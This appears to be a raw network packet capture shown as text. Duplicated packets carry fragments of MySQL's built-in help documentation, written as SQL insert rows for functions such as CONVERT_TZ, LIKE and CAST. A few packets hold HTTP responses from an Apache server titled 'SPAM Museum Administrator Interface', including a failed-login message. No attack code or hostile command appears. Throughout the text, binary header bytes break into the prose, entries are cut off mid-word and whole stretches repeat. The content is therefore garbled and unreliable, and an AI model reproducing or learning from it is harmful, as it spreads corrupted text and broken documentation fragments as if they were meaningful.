Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,' BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATE VIEW statement that creates\nthe given view.\n','SHOW CREATE VIEW view_name',''),(344,'INTERVAL',26,' INTERVAL(N,N1,N2,N3,...)\nReturns 0 if N < N1, 1 if N < N2\nand so on or -1 if N is NULL. All arguments are treated\nas integerC_ bbBi0`ET@/p܂Ao0E SELECT BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\'));\n+----------------------------------------------+\n| BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\')) |\n+----------------------------------------------+\n| 0 |\n+----------------------------------------------+\n1 row in set (4.74 sec)',''),(290,'YEAR',14,' YEAR(date)\nReturns the year for date, in the range 1000 to 9999.\n','mysql> SELECT YEAR(\'98-02-03\');\n -> 1998',''),(291,'SHOW ENGINE',6,'SHOW ENGINE displays log or status information about storage engines.\nThe following statements currently are supported:\n\nSHOW ENGINE BDB LOGS\nSHOW ENGINE INNODB STATUS\n\nSHOW ENGINE BDB LOGS displays status information about existing\nBDB log files. It returns the following fields:\n\n\n File\nThe full path to the log file.\n\n Type\nThe log file type (BDB for Berkeley DB log files).\n\n Status\nThe status of the log file (FREE if the file can be removed, or\nIN USE if the file is needed by the transaction subsystem)\n\n \n\nSHOW ENGINE INNODB STATUS displays extensive information about the\nstate of the InnC1_ bb0`BiET@/Ԁo0SE SELECT BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\'));\n+----------------------------------------------+\n| BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\')) |\n+----------------------------------------------+\n| 0 |\n+----------------------------------------------+\n1 row in set (4.74 sec)',''),(290,'YEAR',14,' YEAR(date)\nReturns the year for date, in the range 1000 to 9999.\n','mysql> SELECT YEAR(\'98-02-03\');\n -> 1998',''),(291,'SHOW ENGINE',6,'SHOW ENGINE displays log or status information about storage engines.\nThe following statements currently are supported:\n\nSHOW ENGINE BDB LOGS\nSHOW ENGINE INNODB STATUS\n\nSHOW ENGINE BDB LOGS displays status information about existing\nBDB log files. It returns the following fields:\n\n\n File\nThe full path to the log file.\n\n Type\nThe log file type (BDB for Berkeley DB log files).\n\n Status\nThe status of the log file (FREE if the file can be removed, or\nIN USE if the file is needed by the transaction subsystem)\n\n \n\nSHOW ENGINE INNODB STATUS displays extensive information about the\nstate of the InnC`c bbBi0`ET@/p܂Ao0E SELECT 1 IS NULL, 0 IS NULL, NULL IS NULL;\n -> 0, 0, 1\nmysql> SELECT 1 IS NOT NULL, 0 IS NOT NULL, NULL IS NOT NULL;\n -> 1, 1, 0',''),(294,'CONVERT_TZ',14,' CONVERT_TZ(dt,from_tz,to_tz)\n\nCONVERT_TZ()\nconverts a datetime value dt from time zone given by from_tz\nto the time zone given by to_tz and returns the resulting value.\nTime zones may be specified as described in [Time zone support].\nThis function returns NULL if the arguments are inCkc **Bi0`E@/tAo0E9p@??  3Pb1f( 7 )HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 20:43:50 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface
Cc bb0`BiET@/Ԁo0SE SELECT 1 IS NULL, 0 IS NULL, NULL IS NULL;\n -> 0, 0, 1\nmysql> SELECT 1 IS NOT NULL, 0 IS NOT NULL, NULL IS NOT NULL;\n -> 1, 1, 0',''),(294,'CONVERT_TZ',14,' CONVERT_TZ(dt,from_tz,to_tz)\n\nCONVERT_TZ()\nconverts a datetime value dt from time zone given by from_tz\nto the time zone given by to_tz and returns the resulting value.\nTime zones may be specified as described in [Time zone support].\nThis function returns NULL if the arguments are inCc **0`BiE@/ o0SE9p@@?  3Pb1f( 7 )HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 20:43:50 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface
Cd ZZBi0`EL@/Ao0E4@?  ֞Pg%~"l empCd ZZ0`BiEL@/o0˃2E4@@  ֞Pg%~"l empCr ZZBi0`EL@/Ao0E4@?  ֞Pg%"l  emqCr ZZ0`BiEL@/o0˃2E4@@  ֞Pg%"l  emqCys bbBi0`ET@/u܂Ao0E<@?%x  3P0 >ǠT )NCs bb0`BiET@/Ԁo0SE<@@$x  3P0 >ǠU )NClu bbBi0`ET@/أ  o0E<@?|  PPZ脀 h `-d]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]\n\nWith INSERT ... SELECT, you can quickly insert many rows\ninto a table from one or many tables.\n','INSERT INTO tbl_temp2 (fld_id)\n SELECT tbl_temp1.fld_order_id\n FROM tbl_temp1 WHERE tbl_temp1.fld_order_id > 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(240,'LOAD INDEX',6,'The LOAD INDEX INTO CACHE statement preloads a table index into the\nkey cache to which it has been assigned by an explicit CACHE INDEX\nstatement, or into the default key cache otherwise. LOAD INDEX INTO\nCACHE is used only for MyISAM tables.\n\nThe IGNORE LEAVES modifier causes only blocks for the non-leaf\nnodes of the index to be preloaded.\n','LOAD INDEX INTO CACHE\n tbl_index_list [, tbl_index_list] ...\n\ntbl_index_list:\n tbl_name\n [[INDEX|KEY] (index_name[, index_name] ...)]\n [IGNORE LEAVES]',''),(241,'UNION',6,'UNION is used to combine the result from many SELECT\nstatements into one result set. UNION is available from MySQL 4.0.0\non.\n\nSelected columns listed in corresponding positiCu bb0`BiET@/o0AE<@@{  PPZ脀 h `-d]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]\n\nWith INSERT ... SELECT, you can quickly insert many rows\ninto a table from one or many tables.\n','INSERT INTO tbl_temp2 (fld_id)\n SELECT tbl_temp1.fld_order_id\n FROM tbl_temp1 WHERE tbl_temp1.fld_order_id > 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(240,'LOAD INDEX',6,'The LOAD INDEX INTO CACHE statement preloads a table index into the\nkey cache to which it has been assigned by an explicit CACHE INDEX\nstatement, or into the default key cache otherwise. LOAD INDEX INTO\nCACHE is used only for MyISAM tables.\n\nThe IGNORE LEAVES modifier causes only blocks for the non-leaf\nnodes of the index to be preloaded.\n','LOAD INDEX INTO CACHE\n tbl_index_list [, tbl_index_list] ...\n\ntbl_index_list:\n tbl_name\n [[INDEX|KEY] (index_name[, index_name] ...)]\n [IGNORE LEAVES]',''),(241,'UNION',6,'UNION is used to combine the result from many SELECT\nstatements into one result set. UNION is available from MySQL 4.0.0\non.\n\nSelected columns listed in corresponding positiC bbBi0`ET@/p܂Ao0E SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'GMT\',\'MET\');\n -> \'2004-01-01 13:00:00\'\nmysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'+00:00\',\'-07:00\');\n -> \'2004-01-01 05:00:00\'',''),(295,'TIME_TO_SEC',14,' TIME_TO_SEC(time)\nReturns the time argument, converted to seconds.\n','mysql> SELECT TIME_TO_SEC(\'22:23:00\');\n -> 80580\nmysql> SELECT TIME_TO_SEC(\'00:39:38\');\n -> 2378',''),(296,'WEEKDAY',14,' WEEKDAY(date)\nReturns the weekday index for\ndate (0 = Monday, 1 = Tuesday, ... 6 = Sunday).\n','mysql> SELECT WEEKDAY(\'1998-02-03 22:23:00\');\n -> 1\nmysql> SELECT WEEKDAY(\'1997-11-05\');\n -> 2',''),(297,'EXPORT_SET',23,' EXPORT_SET(bits,on,off[,separator[,number_of_bits]])\nReturns a string in which for every bit set in the value bits, you\nget an on string and for every reset bit you get an off\nstring. Bits in bits are examined from right to left (from low-order\nto high-order bits). Strings are added to the result from left to right,\nseparated by the separator string (default \',\'). The number of\nbits examined is given by number_of_bits (default 64).\n','mysql> SELECT EXPORT_SET(5,\'Y\',\'N\',\',\',4);\n -> \'Y,N,Y,N\'\nmysql> SELECT EXPORT_SET(6,\'1\',\'0\',\',\',10);C bb0`BiET@/Ԁo0SE SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'GMT\',\'MET\');\n -> \'2004-01-01 13:00:00\'\nmysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'+00:00\',\'-07:00\');\n -> \'2004-01-01 05:00:00\'',''),(295,'TIME_TO_SEC',14,' TIME_TO_SEC(time)\nReturns the time argument, converted to seconds.\n','mysql> SELECT TIME_TO_SEC(\'22:23:00\');\n -> 80580\nmysql> SELECT TIME_TO_SEC(\'00:39:38\');\n -> 2378',''),(296,'WEEKDAY',14,' WEEKDAY(date)\nReturns the weekday index for\ndate (0 = Monday, 1 = Tuesday, ... 6 = Sunday).\n','mysql> SELECT WEEKDAY(\'1998-02-03 22:23:00\');\n -> 1\nmysql> SELECT WEEKDAY(\'1997-11-05\');\n -> 2',''),(297,'EXPORT_SET',23,' EXPORT_SET(bits,on,off[,separator[,number_of_bits]])\nReturns a string in which for every bit set in the value bits, you\nget an on string and for every reset bit you get an off\nstring. Bits in bits are examined from right to left (from low-order\nto high-order bits). Strings are added to the result from left to right,\nseparated by the separator string (default \',\'). The number of\nbits examined is given by number_of_bits (default 64).\n','mysql> SELECT EXPORT_SET(5,\'Y\',\'N\',\',\',4);\n -> \'Y,N,Y,N\'\nmysql> SELECT EXPORT_SET(6,\'1\',\'0\',\',\',10);C bbBi0`ET@/p܂Ao0E \'0,1,1,0,0,0,0,0,0,0\'',''),(298,'TIME FUNCTION',14,' TIME(expr)\n\nExtracts the time part of the time or datetime expression expr.\n','mysql> SELECT TIME(\'2003-12-31 01:02:03\');\n -> \'01:02:03\'\nmysql> SELECT TIME(\'2003-12-31 01:02:03.000123\');\n -> \'01:02:03.000123\'',''),(299,'CAST',23,'The CAST() and CONVERT() functions can be used to take a\nvalue of one type and produce a value of another type.\n\nThe type can be one of the following values:\n\n --- BINARY\n --- CHAR\n --- DATE\n --- DATETIME\n --- SIGNED [INTEGER]\n --- TIME\n --- UNSIGNED [INTEGER]\n\nBINARY produces a binary string. See the entry for the BINARY\noperator in this section for a description of how this affects comparisons.\n\nCAST() and CONVERT() are available as of MySQL 4.0.2.\nThe CHAR conversion type is available as of 4.0.6.\nThe USING form of CONVERT() is available as of 4.1.0.\n\nCAST() and CONVERT(... USING ...) are standard SQL syntax.\nThe non-USING form of CONVERT() is ODBC syntax.\n\nCONVERT() with USING is used to convert data between different\ncharacter sets. In MySQL, transcoding names are the same as the\ncorresponding character set names. For example, this statement converts\nthe string \'abc\' in the server\'s default character set to theC bbBi0`ET@/p܂Ao0E SELECT PERIOD_DIFF(9802,199703);\n -> 11',''),(302,'LIKE',23,' expr LIKE pat [ESCAPE \'escape-char\']\nPattern matching using\nSQL simple regular expression comparison. Returns 1 (TRUE) or 0\n(FALSE). If either expr or pat is NULL, the result is\nNULL.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nWith LIKE you can use the following two wildcard characters\nin the pattern:\n\n Character Description\n % Matches any number of characters, even zero characters\n _ Matches exactly one character\n \n','mysqlC& bb0`BiET@/Ԁo0SE \'0,1,1,0,0,0,0,0,0,0\'',''),(298,'TIME FUNCTION',14,' TIME(expr)\n\nExtracts the time part of the time or datetime expression expr.\n','mysql> SELECT TIME(\'2003-12-31 01:02:03\');\n -> \'01:02:03\'\nmysql> SELECT TIME(\'2003-12-31 01:02:03.000123\');\n -> \'01:02:03.000123\'',''),(299,'CAST',23,'The CAST() and CONVERT() functions can be used to take a\nvalue of one type and produce a value of another type.\n\nThe type can be one of the following values:\n\n --- BINARY\n --- CHAR\n --- DATE\n --- DATETIME\n --- SIGNED [INTEGER]\n --- TIME\n --- UNSIGNED [INTEGER]\n\nBINARY produces a binary string. See the entry for the BINARY\noperator in this section for a description of how this affects comparisons.\n\nCAST() and CONVERT() are available as of MySQL 4.0.2.\nThe CHAR conversion type is available as of 4.0.6.\nThe USING form of CONVERT() is available as of 4.1.0.\n\nCAST() and CONVERT(... USING ...) are standard SQL syntax.\nThe non-USING form of CONVERT() is ODBC syntax.\n\nCONVERT() with USING is used to convert data between different\ncharacter sets. In MySQL, transcoding names are the same as the\ncorresponding character set names. For example, this statement converts\nthe string \'abc\' in the server\'s default character set to theC9 bb0`BiET@/Ԁo0SE SELECT PERIOD_DIFF(9802,199703);\n -> 11',''),(302,'LIKE',23,' expr LIKE pat [ESCAPE \'escape-char\']\nPattern matching using\nSQL simple regular expression comparison. Returns 1 (TRUE) or 0\n(FALSE). If either expr or pat is NULL, the result is\nNULL.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nWith LIKE you can use the following two wildcard characters\nin the pattern:\n\n Character Description\n % Matches any number of characters, even zero characters\n _ Matches exactly one character\n \n','mysqlCo bbBi0`ET@/p܂Ao0E SELECT \'David!\' LIKE \'David_\';\n -> 1\nmysql> SELECT \'David!\' LIKE \'%D%v%\';\n -> 1',''),(303,'MULTIPOINT',2,' MultiPoint(pt1,pt2,...)\nConstructs a WKB MultiPoint value using WKB Point arguments.\nIf any argument is not a WKB Point, the return value is NULL.\n','',''),(304,'>>',27,' >>\nShifts a longlong (BIGINT) number to the right.\n','mysql> SELECT 4 >> 2;\n -> 1',''),(305,'TRUE FALSE',22,'TRUE and FALSE added as alias for 1 and 0, respectively.\n','',''),(306,'AVG',12,' AVG([DISTINCT] expr)\nReturns the average value of expr.\nThe DISTINCT option can be used as of MySQL 5.0.3 to return the averge\nof the distinct values of expr.\n','mysql> SELECT student_name, AVG(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(307,'MBRWITHIN',8,' MBRWithin(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle\nof g1 is within the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Polygon((0 0,0 5,5 5,5 0,0 0))\');\nmysql> SELECT MBRWithin(@g1,@g2), MBRWithin(@g2,@g1);\n+--------------------+--------------------+\n| MBRWithin(@g1,@g2) | MBRWithin(@g2,@g1) |\n+--------------------+---------------C bb0`BiET@/Ԁo0SE SELECT \'David!\' LIKE \'David_\';\n -> 1\nmysql> SELECT \'David!\' LIKE \'%D%v%\';\n -> 1',''),(303,'MULTIPOINT',2,' MultiPoint(pt1,pt2,...)\nConstructs a WKB MultiPoint value using WKB Point arguments.\nIf any argument is not a WKB Point, the return value is NULL.\n','',''),(304,'>>',27,' >>\nShifts a longlong (BIGINT) number to the right.\n','mysql> SELECT 4 >> 2;\n -> 1',''),(305,'TRUE FALSE',22,'TRUE and FALSE added as alias for 1 and 0, respectively.\n','',''),(306,'AVG',12,' AVG([DISTINCT] expr)\nReturns the average value of expr.\nThe DISTINCT option can be used as of MySQL 5.0.3 to return the averge\nof the distinct values of expr.\n','mysql> SELECT student_name, AVG(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(307,'MBRWITHIN',8,' MBRWithin(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle\nof g1 is within the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Polygon((0 0,0 5,5 5,5 0,0 0))\');\nmysql> SELECT MBRWithin(@g1,@g2), MBRWithin(@g2,@g1);\n+--------------------+--------------------+\n| MBRWithin(@g1,@g2) | MBRWithin(@g2,@g1) |\n+--------------------+---------------Cҍ bbBi0`ET@/p܂Ao0E<9@?L>  3PX0tڀ O )Png its WKT representation and SRID.\n','',''),(335,'BLOB',1,'A BLOB is a binary large object that can hold a variable amount of\ndata. The four BLOB types, TINYBLOB, BLOB,\nMEDIUMBLOB, and LONGBLOB, differ only in the maximum length of\nthe values they can hold.\n','',''),(336,'PASSWORD',17,'','mysql> SELECT PASSWORD(\'badpwd\');\n -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length specification\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEXT, and CHAR(200000) is converted to MEDIUMTEXT.\nThis is a compatibility feature. However, this conversion causes the column\nto become a variable-length column, and also affects trailing-space removal.\n\nCHAR is shorthand for CHARACTER.\nNATIONAL CHAR (or its equivalent short form, NCHAR) is the\nstandard SQL way to define that a CHAR column should use tC bb0`BiET@/Ԁo0SE<9@@K>  3PX0tڀ O )Png its WKT representation and SRID.\n','',''),(335,'BLOB',1,'A BLOB is a binary large object that can hold a variable amount of\ndata. The four BLOB types, TINYBLOB, BLOB,\nMEDIUMBLOB, and LONGBLOB, differ only in the maximum length of\nthe values they can hold.\n','',''),(336,'PASSWORD',17,'','mysql> SELECT PASSWORD(\'badpwd\');\n -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length specification\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEXT, and CHAR(200000) is converted to MEDIUMTEXT.\nThis is a compatibility feature. However, this conversion causes the column\nto become a variable-length column, and also affects trailing-space removal.\n\nCHAR is shorthand for CHARACTER.\nNATIONAL CHAR (or its equivalent short form, NCHAR) is the\nstandard SQL way to define that a CHAR column should use tCE bbBi0`ET@/ԂSŀo0E<`@?/ 3 Pz )cCf bb0`BiET@/g܀o0AE<`@@. 3 P )cC8 bbBi0`ET@/p܂Ao0E<@?  3P\ޞ ' )Pexpr.\n','mysql> SELECT student_name, AVG(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(307,'MBRWITHIN',8,' MBRWithin(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle\nof g1 is within the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Polygon((0 0,0 5,5 5,5 0,0 0))\');\nmysql> SELECT MBRWithin(@g1,@g2), MBRWithin(@g2,@g1);\n+--------------------+--------------------+\n| MBRWithin(@g1,@g2) | MBRWithin(@g2,@g1) |\n+--------------------+--------------------+\n| 1 | 0 |\n+--------------------+--------------------+',''),(308,'IN',26,' expr IN (value,...)\nReturns 1 if expr is any of the values in the IN list,\nelse returns 0. If all values are constants, they are\nevaluated according to the type of expr and sorted. The search for the\nitem then is done using a binary search. This means IN is very quick\nif the IN value list consists entirely of constants. If expr\nis a case-sensitive string expression, the string comparison is performed in\ncase-sensitive fashion.\n','mysql> SELECT 2 IN (0,3,5,\'wefwf\');\n -> 0\nmysql> SELECT \'wefwf\' IN (0,3,5,\'wefwf\');\n -CT bb0`BiET@/Ԁo0SE<@@  3P\ޞ ' )Pexpr.\n','mysql> SELECT student_name, AVG(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(307,'MBRWITHIN',8,' MBRWithin(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle\nof g1 is within the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Polygon((0 0,0 5,5 5,5 0,0 0))\');\nmysql> SELECT MBRWithin(@g1,@g2), MBRWithin(@g2,@g1);\n+--------------------+--------------------+\n| MBRWithin(@g1,@g2) | MBRWithin(@g2,@g1) |\n+--------------------+--------------------+\n| 1 | 0 |\n+--------------------+--------------------+',''),(308,'IN',26,' expr IN (value,...)\nReturns 1 if expr is any of the values in the IN list,\nelse returns 0. If all values are constants, they are\nevaluated according to the type of expr and sorted. The search for the\nitem then is done using a binary search. This means IN is very quick\nif the IN value list consists entirely of constants. If expr\nis a case-sensitive string expression, the string comparison is performed in\ncase-sensitive fashion.\n','mysql> SELECT 2 IN (0,3,5,\'wefwf\');\n -> 0\nmysql> SELECT \'wefwf\' IN (0,3,5,\'wefwf\');\n -C bbBi0`ET@/p܂Ao0E SELECT 2 IN (0,3,5,\'wefwf\');\n -> 0\nmysql> SELECT \'wefwf\' IN (0,3,5,\'wefwf\');\n -> 1',''),(309,'QUOTE',23,' QUOTE(str)\nQuotes a string to produce a result that can be used as a properly escaped\ndata value in an SQL statement. The string is returned surrounded by single\nquotes and with each instance of single quote (\'\'\'), backslash (\'\\\'),\nASCII NUL, and Control-Z preceded by a backslash. If the argument is\nNULL, the return value is the word ``NULL\'\' without surrounding\nsingle quotes.\nThe QUOTE() function was added in MySQL 4.0.3.\n','mysql> SELECT QUOTE(\'Don\\\'t!\');\n -> \'Don\\\'t!\'\nmysql> SELECT QUOTE(NULL);\n -> NULL',''),(310,'SESSION_USER',25,' C) ZZBi0`EL@/܂Sŀo0E4\S@?, 3 Pu}U=$ )cCA bb0`BiET@/Ԁo0SE SELECT 2 IN (0,3,5,\'wefwf\');\n -> 0\nmysql> SELECT \'wefwf\' IN (0,3,5,\'wefwf\');\n -> 1',''),(309,'QUOTE',23,' QUOTE(str)\nQuotes a string to produce a result that can be used as a properly escaped\ndata value in an SQL statement. The string is returned surrounded by single\nquotes and with each instance of single quote (\'\'\'), backslash (\'\\\'),\nASCII NUL, and Control-Z preceded by a backslash. If the argument is\nNULL, the return value is the word ``NULL\'\' without surrounding\nsingle quotes.\nThe QUOTE() function was added in MySQL 4.0.3.\n','mysql> SELECT QUOTE(\'Don\\\'t!\');\n -> \'Don\\\'t!\'\nmysql> SELECT QUOTE(NULL);\n -> NULL',''),(310,'SESSION_USER',25,' CQ ZZ0`BiEL@/go0AE4\S@@, 3 Pu}U=$ )cC~ bbBi0`ET@/p܂Ao0E SELECT QUARTER(\'98-04-01\');\n -> 2',''),(312,'POSITION',23,' POSITION(substr IN str)\n\nPOSITION(substr IN str) is a synonym for LOCATE(substr,str).\n','mysql> SELECT LOCATE(\'bar\', \'foobarbar\');\n -> 4\nmysql> SELECT LOCATE(\'xbar\', \'foobar\');\n -> 0\nmysql> SELECT LOCATE(\'bar\', \'foobarbar\',5);\n -> 7',''),(313,'IS_USED_LOCK',21,' IS_USED_LOCK(str)\nChecks whether the lock named str is in use (that is, locked).\nIf so, it returns the connection identifier of the client that holds\nthe lock.\nOtherwise, it returns NULL.\n','',''),(314,'POLYFROMTEXT',3,' PolyFromText(wkt[,srid])\n PolygonFromText(wkt[,srid])\nConstructs a POLYGON value using its WKT representation and SRID.\n','',''),(315,'DES_ENCRYPT',17,' DES_ENCRYPT(str[,(key_num|key_str)])\n\nEncrypts the string with the given key using the Triple-DES algorithm.\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. See also : [Secure connections].\n\nThe encryption key to use is chosen based on the second argument to\nDC bb0`BiET@/Ԁo0SE SELECT QUARTER(\'98-04-01\');\n -> 2',''),(312,'POSITION',23,' POSITION(substr IN str)\n\nPOSITION(substr IN str) is a synonym for LOCATE(substr,str).\n','mysql> SELECT LOCATE(\'bar\', \'foobarbar\');\n -> 4\nmysql> SELECT LOCATE(\'xbar\', \'foobar\');\n -> 0\nmysql> SELECT LOCATE(\'bar\', \'foobarbar\',5);\n -> 7',''),(313,'IS_USED_LOCK',21,' IS_USED_LOCK(str)\nChecks whether the lock named str is in use (that is, locked).\nIf so, it returns the connection identifier of the client that holds\nthe lock.\nOtherwise, it returns NULL.\n','',''),(314,'POLYFROMTEXT',3,' PolyFromText(wkt[,srid])\n PolygonFromText(wkt[,srid])\nConstructs a POLYGON value using its WKT representation and SRID.\n','',''),(315,'DES_ENCRYPT',17,' DES_ENCRYPT(str[,(key_num|key_str)])\n\nEncrypts the string with the given key using the Triple-DES algorithm.\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. See also : [Secure connections].\n\nThe encryption key to use is chosen based on the second argument to\nDC bbBi0`ET@/p܂Ao0E<*@?  3POb  )Qides information about the columns in a table. It is a\nshortcut for SHOW COLUMNS FROM. As of MySQL 5.0.1, these statements\nalso display information for views.\n','',''),(261,'STDDEV_POP',12,' STDDEV_POP(expr)\nReturns the population standard deviation of expr (the square root of\nVAR_POP()). This function was added in MySQL 5.0.3. Before 5.0.3,\nyou can use STD() or STDDEV(), which are equivalent but not\nstandard SQL.\n','',''),(262,'SUBSTRING',23,' SUBSTRING(str,pos)\n SUBSTRING(str FROM pos)\n SUBSTRING(str,pos,len)\n SUBSTRING(str FROM pos FOR len)\n\nThe forms without a len argument\nreturn a substring from string str starting at position pos.\nThe forms with a len argument\nreturn a substring len characters long from string str,\nstarting at position pos.\nThe forms that use FROM are standard SQL syntax.\n','mysql> SELECT SUBSTRING(\'Quadratically\',5);\n -> \'ratically\'\nmysql> SELECT SUBSTRING(\'foobarbar\' FROM 4);\n -> \'barbar\'\nmysql> SELECT SUBSTRING(\'Quadratically\',5,6);\n -> \'ratica\'',''),(263,'ISEMPTY',19,' IsEmpty(g)\nReturns 1 if the geometry value g is the empty geometry, 0 if it is not\nempty, and -1 if the argument is NULL.\nIf the geometry is empty, it represents the empty point set.\n','',''),(264,'LTRC bb0`BiET@/Ԁo0SE<*@@  3POb  )Qides information about the columns in a table. It is a\nshortcut for SHOW COLUMNS FROM. As of MySQL 5.0.1, these statements\nalso display information for views.\n','',''),(261,'STDDEV_POP',12,' STDDEV_POP(expr)\nReturns the population standard deviation of expr (the square root of\nVAR_POP()). This function was added in MySQL 5.0.3. Before 5.0.3,\nyou can use STD() or STDDEV(), which are equivalent but not\nstandard SQL.\n','',''),(262,'SUBSTRING',23,' SUBSTRING(str,pos)\n SUBSTRING(str FROM pos)\n SUBSTRING(str,pos,len)\n SUBSTRING(str FROM pos FOR len)\n\nThe forms without a len argument\nreturn a substring from string str starting at position pos.\nThe forms with a len argument\nreturn a substring len characters long from string str,\nstarting at position pos.\nThe forms that use FROM are standard SQL syntax.\n','mysql> SELECT SUBSTRING(\'Quadratically\',5);\n -> \'ratically\'\nmysql> SELECT SUBSTRING(\'foobarbar\' FROM 4);\n -> \'barbar\'\nmysql> SELECT SUBSTRING(\'Quadratically\',5,6);\n -> \'ratica\'',''),(263,'ISEMPTY',19,' IsEmpty(g)\nReturns 1 if the geometry value g is the empty geometry, 0 if it is not\nempty, and -1 if the argument is NULL.\nIf the geometry is empty, it represents the empty point set.\n','',''),(264,'LTRCܠ  Bi0`E@/M߃lo0Eh@?m  P* SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

C  0`BiE@/ko0AEh@@l  P* SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

CТ bbBi0`ET@/أ  o0E<@?|  PPZ脀  `Gd%ons of each SELECT\nstatement should have the same type. (For example, the first column selected\nby the first statement should have the same type as the first column selected\nby the other statements.) The column names used in\nthe first SELECT statement are used as the column names for the\nresults returned.\n','SELECT ...\nUNION [ALL | DISTINCT]\nSELECT ...\n [UNION [ALL | DISTINCT]\n SELECT ...]',''),(242,'TO_DAYS',14,' TO_DAYS(date)\nGiven a date date, returns a daynumber (the number of days since year\n0).\n','mysql> SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 if the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SELECT NOT 0;\n -> 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(Cڢ ZZBi0`EL@/܂Sŀo0E4@? 3 P"l > )d:C bb0`BiET@/o0AE<@@{  PPZ脀 